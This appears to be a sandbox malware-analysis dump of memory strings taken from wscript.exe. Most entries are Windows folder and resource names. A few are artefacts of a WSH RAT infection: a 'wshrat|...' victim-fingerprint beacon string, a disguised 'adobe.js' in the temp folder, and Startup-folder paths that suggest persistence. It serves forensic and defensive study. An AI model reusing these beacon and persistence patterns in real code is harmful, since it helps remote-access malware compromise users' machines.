Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local documents | memstr_6f0f480f-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\infx | memstr_322f817d-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32r | memstr_89464030-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appdata | memstr_9bf9d6aa-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appdata@ | memstr_0335eeb4-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: roaming | memstr_b705bc3a-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: roaming@ | memstr_f273f912-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1gzct | memstr_75a2d5f8-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: programs | memstr_5b661359-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: programsj | memstr_43ba20b7-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: programs@shell32.dll,-21782 | memstr_8be1cdcd-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .appdata | memstr_6916cce1-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .roaming | memstr_3c40116a-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft | memstr_9c2680a1-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoftd | memstr_cf447fd9-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .microsoft | memstr_5b813959-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: windows | memstr_85e875a8-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: windows@ | memstr_0b0823a7-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .windows | memstr_ce8160c9-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: libraries | memstr_9eb0a25e-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: librariesd | memstr_c4058106-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .libraries | memstr_6f23731d-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21796 | memstr_01ea2abf-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-115 | memstr_cb393ffb-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconindex-173 | memstr_48793b24-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (<pdx | memstr_1f0cf620-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21798 | memstr_73bd2d10-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-184 | memstr_7fb9cfc7-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: desktop@ | memstr_37fb69a7-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .desktop | memstr_9a81bb85-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @ @!@"@#@$@%@&@'@(@)@*@+@,@-@.@/@0@1@2@3@4@5@6@7@8@9@:@;@<@=@>@?@@@a@b@c@d@e@f@g@h@t | memstr_8554a43b-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 303h3d3 | memstr_e71ae684-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 34,4p4t4 | memstr_5917ff3b-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 5(5p5x5 | memstr_e54cf1f7-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 6,6p6p6 | memstr_68d42808-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 7,7p7t7 | memstr_f7708a6c-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 8l8|8 | memstr_81c34f65-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 9<9`9 | memstr_a9732ecf-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :0:t:|: | memstr_b1052c32-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;<;x;t; | memstr_2e13512a-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;< <<<d<c | memstr_d58c0c6d-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: music | memstr_b46b5599-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: music< | memstr_7b859837-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .music | memstr_9069e2cb-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: `m>@p' | memstr_5ea94929-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wv8 p | memstr_c94793e7-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21769 | memstr_c9839074-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-183 | memstr_9aeb2cea-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: videos | memstr_6fd2608c-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: videos> | memstr_dcba7809-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .videos | memstr_868a8238-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-12688 | memstr_bd86ca0b-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\downloads\desktop.ini | memstr_fac96c9e-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21770 | memstr_103c7fcf-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-1040 | memstr_0ff7cda0-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-115 | memstr_417bf1f6-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ::{59031a47-3f72-44a7-89c5-5595fe6b30ee} | memstr_d78bb776-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (wf(wf@j | memstr_afa9ea89-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21779\ | memstr_48605a94-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-108v | memstr_bc0df140-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-12690p | memstr_83906a2a-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-189j | memstr_6bf2dd9c-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21787d | memstr_04219558-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21786~ | memstr_16a3b261-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-117x | memstr_0fd9a8ed-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21790r | memstr_36448816-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-12689l | memstr_62a920e1-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21796f | memstr_531f8e33-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21798` | memstr_433e1027-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\favorites\desktop.ini9d} | memstr_0823105c-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21787 | memstr_088862c4-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21782 | memstr_a3fae154-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21791 | memstr_38e111f9-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-113< | memstr_835e3f62-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\windows.storage.dlll6 | memstr_38077846-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-1840 | memstr_e5154f64-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-112* | memstr_c95fd866-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21797$ | memstr_52896fb7-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\system32\windows.storage.dlll | memstr_1251e128-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @%systemroot%\system32\shell32.dll,-21769 | memstr_12fd815a-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ::{20d04fe0-3aea-1069-a2d8-08002b30309d} | memstr_cd3682f8-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\programdata\microsoft\desktop.ini | memstr_7080a596-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-112 | memstr_8a5f680c-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\fonts\desktop.ini | memstr_fcb1de64-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %systemroot%\system32\imageres.dll,-183 | memstr_8fddd0af-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\documents\desktop.ini | memstr_309e4a43-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: /c:\`1 | memstr_e81943d6-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: progra~3 | memstr_b327e7e0-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: progra~3h | memstr_efb49f23-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: zit.g | memstr_70d0a037-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: programdata | memstr_4109e854-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: micros~1 | memstr_97539244-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: micros~1d | memstr_ad9ccf89-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: zpt.h | memstr_7283f296-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: windows | memstr_11472f4d-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: windows@ | memstr_768ddff9-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startm~1 | memstr_023a0b78-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startm~1n | memstr_8bc509c4-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: start menu@shell32.dll,-21786 | memstr_d32c563c-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21770 | memstr_56c47151-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-112 | memstr_0eb969ab-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconindex-235 | memstr_3230f77d-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: wshrat|b81a4609|user-pc|user|microsoft windows 10 pro|plus|windows defender .|false - 15/4/2025|javascript | memstr_98d81c5d-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: /c:\v1gzct | memstr_ebf9b771-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: zlt.3 | memstr_ff79cb6a-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fonts | memstr_2e16dabe-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fonts< | memstr_dff0030d-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: lfonts | memstr_023a7607-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \rr:\users\user\appdata\local\temp\adobe.jsindows\start menu\programs\startuptop.inih | memstr_9d1d27fa-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 693405117-2476756634-100 | memstr_8bf3dd70-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21786 | memstr_81055f27-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{088e3905-0323-4b02-9826-5d99428e115f}( | memstr_219231e0-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{a8cdff1c-4878-43be-b5fd-f8091c1c60d0} | memstr_180f60c9-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} | memstr_070c9e8c-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup | memstr_3b9f2f41-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de}t | memstr_3ddc8eac-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21787 | memstr_752a1871-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bc:\users\user\appdata\local\temprosoft\windows\start menu\programs\startup | memstr_2988ce7b-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a} | memstr_4b6b0b1f-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: documents | memstr_fb5d381b-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: documentsd | memstr_9ce71190-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .documents | memstr_0fb05c83-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21779 | memstr_90fa509e-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: infotip@%systemroot%\system32\shell32.dll,-12688 | memstr_2305e772-4 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-113 | memstr_9cab8740-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconindex-236 | memstr_163f284a-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startup | memstr_5c0fb67c-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: favorites | memstr_fbd694bb-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: programs | memstr_ff7a79ab-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: onedrive | memstr_a655b54f-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: printhood= | memstr_314fa740-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: documents; | memstr_aac83bf5-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \lder5 | memstr_046fff16-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ,xrs1 | memstr_f9509005-e |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: folder/ | memstr_3e7d3458-9 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ,xfolder- | memstr_48032729-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: downloads+ | memstr_41001e31-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fonts) | memstr_e6784564-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \lder' | memstr_b7d38d33-c |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: pictures# | memstr_64aea4a8-8 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: folder! | memstr_f78e87a5-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: templates | memstr_eca07533-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: startup | memstr_66c1804b-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ,xfolder | memstr_4a627817-b |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: personal | memstr_760a0706-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: jsolder | memstr_a7dc87cc-2 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sendto | memstr_5ecfef9b-7 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: start menu | memstr_1ec926d7-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: nethood | memstr_d7ee5a05-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: folder | memstr_2b19a881-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: recent | memstr_a679896d-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: pictures | memstr_4e97b279-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: picturesb | memstr_23ed45b2-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .pictures | memstr_fd29badd-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21791 | memstr_e3de57c9-5 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: infotip@%systemroot%\system32\shell32.dll,-12690 | memstr_6b1a2449-f |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-189 | memstr_684d3ff6-d |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iconindex-238 | memstr_3fe97e9e-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mycomputerfolderh | memstr_7b3fb7b5-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: common programsg | memstr_c295070d-a |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local downloadsb | memstr_778fd297-1 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local videos | memstr_b2915066-3 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: local pictures | memstr_17c25866-6 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\windows\fonts | memstr_a77e0e13-0 |
Source: wscript.exe, 00000008.00000002.2596269018.000001F861B2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: shell file system foldera | memstr_57b50736-3 |
